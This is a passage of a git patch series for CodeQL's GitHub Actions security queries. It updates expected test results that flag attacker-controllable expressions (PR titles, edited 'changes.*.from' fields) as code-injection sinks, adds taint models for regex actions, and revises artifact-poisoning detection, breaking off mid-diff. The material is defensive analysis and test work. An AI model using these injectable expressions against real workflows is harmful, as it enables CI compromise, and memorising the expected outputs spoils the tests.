.github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | @@ -537,6 +552,10 @@ subpaths | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | ${{ needs.get-artifacts.outputs.ref }} | | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 3ad4e6915d23..e5ad46888522 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -15,6 +15,7 @@ edges | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | @@ -89,8 +90,10 @@ edges | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | provenance | | | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | @@ -170,7 +173,9 @@ nodes | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | @@ -329,11 +334,15 @@ nodes | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | @@ -403,6 +412,10 @@ nodes | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | semmle.label | github.event.changes.body.from | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | semmle.label | github.event.changes.head.ref.from | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | semmle.label | toJson(github.event.changes) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -466,6 +479,7 @@ subpaths | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | From 71960b3ddd80a3686a9912d4650fc33e13507680 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 25 Sep 2024 18:22:46 +0200 Subject: [PATCH 541/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index ecde4c83b206..dc2e1b8e71d1 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.54 +version: 0.1.55 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index cddb4f61bf65..313c90a1423a 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.54 +version: 0.1.55 groups: [actions, queries] suites: codeql-suites extractor: javascript From 010ad359d7059cbe357a129b26fb237a5cb2fd70 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 10:28:44 +0200 Subject: [PATCH 542/707] Add new sources and summary steps --- ql/lib/ext/manual/AsasInnab_regex-action.model.yml | 6 ++++++ ql/lib/ext/manual/MeilCli_regex-match.model.yml | 8 ++++++++ .../manual/actions-ecosystem_action-regex-match.model.yml | 6 ++++++ .../manual/dsfx3d_action-extract-unique-matches.model.yml | 6 ++++++ ql/lib/ext/manual/kaisugi_action-regex-match.model.yml | 7 +++++++ .../manual/paulschuberth_regex-extract-action.model.yml | 7 +++++++ ql/lib/ext/manual/release-kit_regex.model.yml | 7 +++++++ ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml | 7 +++++++ .../ext/manual/tmelliottjr_extract-regex-action.model.yml | 8 ++++++++ 9 files changed, 62 insertions(+) create mode 100644 ql/lib/ext/manual/AsasInnab_regex-action.model.yml create mode 100644 ql/lib/ext/manual/MeilCli_regex-match.model.yml create mode 100644 ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml create mode 100644 ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml create mode 100644 ql/lib/ext/manual/kaisugi_action-regex-match.model.yml create mode 100644 ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml create mode 100644 ql/lib/ext/manual/release-kit_regex.model.yml create mode 100644 ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml create mode 100644 ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml diff --git a/ql/lib/ext/manual/AsasInnab_regex-action.model.yml b/ql/lib/ext/manual/AsasInnab_regex-action.model.yml new file mode 100644 index 000000000000..2efaefb95b62 --- /dev/null +++ b/ql/lib/ext/manual/AsasInnab_regex-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["AsasInnab/regex-action", "*", "input.search_string", "output.first_match", "taint", "manual"] diff --git a/ql/lib/ext/manual/MeilCli_regex-match.model.yml b/ql/lib/ext/manual/MeilCli_regex-match.model.yml new file mode 100644 index 000000000000..74a0f43fd91c --- /dev/null +++ b/ql/lib/ext/manual/MeilCli_regex-match.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["MeilCli/regex-match", "*", "input.search_string", "output.matched_first", "taint", "manual"] + - ["MeilCli/regex-match", "*", "input.search_string", "output.matched_json", "taint", "manual"] + diff --git a/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml b/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml new file mode 100644 index 000000000000..edc9585b5481 --- /dev/null +++ b/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["actions-ecosystem/action-regex-match", "*", "input.text", "output.*", "taint", "manual"] diff --git a/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml b/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml new file mode 100644 index 000000000000..226a151dabab --- /dev/null +++ b/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["dsfx3d/action-extract-unique-matches", "*", "input.text", "output.matches", "taint", "manual"] diff --git a/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml b/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml new file mode 100644 index 000000000000..3e646e4482f2 --- /dev/null +++ b/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["kaisugi/action-regex-match", "*", "input.text", "output.*", "taint", "manual"] + diff --git a/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml b/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml new file mode 100644 index 000000000000..d1d930168dc8 --- /dev/null +++ b/ql/lib/ext/manual/paulschuberth_regex-extract-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["paulschuberth/regex-extract-action", "*", "input.haystack", "output.matches", "taint", "manual"] + diff --git a/ql/lib/ext/manual/release-kit_regex.model.yml b/ql/lib/ext/manual/release-kit_regex.model.yml new file mode 100644 index 000000000000..5b2e5d9c4eb5 --- /dev/null +++ b/ql/lib/ext/manual/release-kit_regex.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["release-kit/regex", "*", "input.string", "output.*", "taint", "manual"] + diff --git a/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml b/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml new file mode 100644 index 000000000000..a0dfb648875e --- /dev/null +++ b/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + - ["tim-actions/get-pr-commits", "*", "output.commits", "text", "manual"] + diff --git a/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml b/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml new file mode 100644 index 000000000000..73fd66c11b9d --- /dev/null +++ b/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSummaryModel + data: + - ["tmelliottjr/extract-regex-action", "*", "input.input", "output.resultString", "taint", "manual"] + - ["tmelliottjr/extract-regex-action", "*", "input.input", "output.resultArray", "taint", "manual"] + From 26f829eff4888306fe190c666a4f4b889538650b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 10:29:47 +0200 Subject: [PATCH 543/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index dc2e1b8e71d1..8447d10d94bf 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.55 +version: 0.1.56 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 313c90a1423a..b167a960886d 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.55 +version: 0.1.56 groups: [actions, queries] suites: codeql-suites extractor: javascript From 86c1d9c30f9b777e03d7a863b48145a06ecb33d5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 12:35:10 +0200 Subject: [PATCH 544/707] Improve artifact poisoning query Better check of download path Add downloading to /tmp as a sanitizer --- .../codeql/actions/dataflow/FlowSources.qll | 2 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 3 +- .../security/ArtifactPoisoningQuery.qll | 68 +++++++++++-------- .../actions/download-artifact-2/action.yaml | 32 +++++++++ .../actions/download-artifact/action.yaml | 32 +++++++++ .../.github/workflows/artifactpoisoning91.yml | 29 ++++++++ .../.github/workflows/artifactpoisoning92.yml | 29 ++++++++ .../ArtifactPoisoningCritical.expected | 11 +++ .../CWE-829/ArtifactPoisoningMedium.expected | 9 +++ .../UntrustedCheckoutCritical.expected | 18 +++++ 10 files changed, 200 insertions(+), 33 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index ce2115847495..4682e7b1abfe 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -107,7 +107,7 @@ class MaDSource extends RemoteFlowSource { /** * A downloaded artifact. */ -private class ArtifactSource extends RemoteFlowSource { +class ArtifactSource extends RemoteFlowSource { ArtifactSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } override string getSourceType() { result = "artifact" } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 9ca17eb4dab2..4b8cff4f4281 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -263,12 +263,11 @@ predicate artifactDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { // /** - * A download artifact step followed by a envvar-injection uses step . + * A download artifact step followed by a uses step . */ predicate artifactDownloadToUsesStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Step artifact, Uses uses | controlledCWD(artifact) and - madSink(succ, "envvar-injection") and pred.asExpr() = artifact and succ.asExpr() = uses and artifact.getAFollowingStep() = uses diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 6881caccd52e..236cc4d80914 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -7,10 +7,7 @@ import codeql.actions.security.PoisonableSteps string unzipRegexp() { result = ".*(unzip|tar)\\s+.*" } -string unzipDirArgRegexp() { - result = "-d\\s+\"([^ ]+)\".*" or - result = "-d\\s+'([^ ]+)'.*" -} +string unzipDirArgRegexp() { result = "-d\\s+([^ ]+).*" } abstract class UntrustedArtifactDownloadStep extends Step { abstract string getPath(); @@ -164,11 +161,11 @@ class ActionsGitHubScriptDownloadStep extends UntrustedArtifactDownloadStep, Use .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) + trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) else if this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) then result = "" @@ -199,13 +196,14 @@ class GHRunArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or script.splitAt("\n").regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then - result = script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) or result = - this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) + trimQuotes(script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) or + result = + trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) else if this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) or @@ -245,37 +243,47 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { .splitAt("\n") .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then - result = script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) or result = - this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) + trimQuotes(script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) or + result = + trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + 